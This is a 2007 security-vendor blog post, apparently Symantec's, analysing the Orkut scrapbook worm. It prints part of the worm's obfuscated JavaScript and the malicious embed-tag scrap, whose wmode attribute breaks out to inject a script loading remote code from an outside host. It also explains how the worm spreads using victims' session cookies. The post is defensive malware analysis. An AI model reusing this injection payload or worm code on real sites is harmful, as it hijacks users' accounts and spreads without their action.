Friday, December 21, 2007 8:20 AM
cmosby
Symantec Security Response Weblog: The Orkut Worm Has Landed!
The Orkut Worm Has Landed!
Orkut is a popular social networking site with millions of registered users. A couple of days ago Orkut was hit with a worm that impacted close to 700,000 users in approximately 24 hours. We took a closer look at the exploit to get an idea of why so many users' systems were infected. The exploit was contained in a JavaScript file, aptly named "virus.js" file, which was injected using an embed tag. Here is a snippet of the JavaScript file:
function $(p,a,c,k,e,d) {
e=function(c) {
return(c35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
while(c--){d[e(c)]=k
||e(c)}
k=[function(e){return d
}];
e=function(){return'\\w+'};
c=1
};
while(c--){
if(k){
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k)
}
}
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];
7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?";
m="+m.2f():"")+(c?";
c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);
6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?";
9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);
3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));
f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&
15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);
3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
…
We can see from the above code that the JavaScript is heavily obfuscated. After decoding and analyzing the strings in the script we confirmed that it is indeed targeting Orkut users. Our analysis of the decoded JavaScript showed that when the virus.js script is executed it forces the user to join a community called “Infectados pelo Vírus do Orkut”. The name of this community is in Portuguese and translates to “Infected by Virus Orkut.”
This is a novel way for the author of the worm to keep track of accounts infected by the worm. The script then loads the "friends list" of the infected Orkut account and sends them a malicious scrap. The worm uses Orkut scrap entries as its vector of propagation. Below is an example of the code to define the Orkut scrap:
2008 vem ai… que ele comece mto bem par avc
<br/>
[silver]RL Wed Dec 19 14:57:48 UTC+0530 2007[/silver]
<br/>
<embed src=http://www.orkut.com/LoL.aspx type=
“application/x-shockwave-flash” wmode=”transparent’);
Script=document.createElement(‘script’);
Script.src=’http://files.myopera111.com/[REMOVED].js’;
Document.getElementByTagname(‘head’)[0].appendChild
(script);escape(‘” width=”1” height=”1”>
</embed>
When you look at the code there are a few attributes for the embed tag, such as wmode, width, height, etc. The embed tag expects these attributes in order to create a flash object to display the flash content. Now when you look closely at the code, notice the wmode attribute:
wmode=”transparent’);
The author has closed wmode with ‘); and has added some script code in the attribute value itself. Let’s analyze this further. We tested the script with a variant of the malicious scrap:
“<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode="transparent” width=”1” height=”1”>”.
When Orkut parsed this scrapbook entry, we found it behaved in a similar way to the following code in an Orkut page:
<script type="text/javascript">
var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx',
'337533968', '1', '1', '9', '#FFFFFF',
'autohigh', '', '', '337533968');
flashWriter._addParam('wmode', 'transparent');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');
flashWriter._setAttribute('style', '');
flashWriter._write('flashDiv337533968');</script>
The Orkut application parsed the scrap text and created the flash object with values specified in the scrap.
If we look at the source code of the malicious scrap it looks like the below sample (the injected code is marked in bold and red). Note the escape function is added to allow the malicious code to be integrated:
flashWriter._addParam ( 'wmode', 'transparent');
script = document.createElement ( 'script');
script.src = 'http://files.myopera.com/virusd[REMOVED]';
document.getElementsByTagName ( 'head') [0]. AppendChild script);
escape ('');
flashWriter._addParam ( 'allowNetworking', 'internal');
flashWriter._addParam ( 'allowScriptAccess',' never ');
Based on what we seen so far we can infer that the Orkut application filters failed to parse this attribute in the request. It took the whole wmode value as is and added it in the rendering code:
flashWriter._addParam('wmode', 'transparent'); (malicious script)
In this way the worm inserts a malicious script using the embed tag and uses it for exploitation. Interestingly, a victim doesn’t need to click on the scrap. When the scrapbook is loaded the malicious embed flash code loads the virus.js file silently. The JavaScript takes the cookies and tokens of the logged in user and uses it to spread the worm further.
This worm illustrates how a simple script injection exploit could affect a large social networking site. Remember, users didn’t have to click anything as the malicious script runs silently as soon as the page is loaded. This worm could have been used for other malicious purposes, such as stealing cookies, exploiting other vulnerabilities, or stealing sensitive data as well.
As of today, the virus.js script is no longer available on the site and it seems as if there have been adequate checks implemented by Orkut to validate content when posting a scrap. The malicious scraps have also been deleted from the scrapbook of the infected users.
Symantec has built a number of excellent Web browsing protections into our 2008 product range.
The worm is detected by Symantec's antivirus products with certified definitions of 12/19/2007 rev. 7 and greater as JS.Woorkut. We recommend that you keep your Symantec products up-to-date, patch your systems, and run your browser with limited options enabled.
Posted by Umesh Wanve on December 20, 2007 08:30 AM